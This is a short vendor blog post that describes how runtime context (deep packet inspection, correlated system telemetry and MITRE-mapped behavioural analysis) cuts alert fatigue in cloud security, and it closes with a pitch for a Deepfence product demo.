Runtime Context​: What is it and Why is it Critical to Your Cloud Security?

Runtime Context​: What is it and Why is it Critical to Your Cloud Security?
March 6, 2024

We have talked about how adding 'runtime context' to static security scans helps reduce alert fatigue and prioritizes security protection and remediation based on a risk framework. However, we haven't shared examples of runtime context that we use to achieve this. More 👇

Deep Packet Inspection

Looking at North-South as well as East-West traffic is important, as well as being able to see encrypted as well as plain text traffic within the network. Teams can use this visibility to match emerging threats rulesets as well as modsecurity core rules.

Benefits of DPI in the cloud include:

  1. Comprehensive and granular inspection of network traffic, enabling early detection and prevention of potential threats in real time.
  2. Regulatory compliance by enabling fine-grained control and monitoring of network activity.

Correlated Telemetry Across Different Modalities of System Behavior

Teams must be able to observe and correlate anomalous behavior across filesystems, process and system calls, as well as network traffic, security scans, SBOM, etc.

Benefits of correlation include:

  1. Early Detection of Advanced Threats - identify anomalous behavior in one area and able to watch other areas
  2. Better Incident Response with a holistic understanding of events
  3. Better Understanding of Dependencies - which enables response

Behavioral Analysis in terms of MITRE

Threat actor events in runtime should be mapped and correlated to various stages of the cyber kill chain. These threat actor TTPs allow organizations to understand how exactly a threat actor would move w/i the environment to execute a successful attack

Benefits of Behavioral Analysis include:

  1. Early threat detection and prevention
  2. Improved incident response and mitigation
  3. Reduced risk and enhanced security posture

All of this additional 'runtime context' ultimately allows for the reduction of alert fatigue because it focuses on the continuous threats against a ☁️ cloud environment and is able to understand what is actively exploitable based on runtime context. See a 97% reduction in alerts with this.

If you want to learn more about how Deepfence's cloud-native application protection platform implements runtime context to help better your security posture, schedule a demo with Ryan Smith, our Head of Product.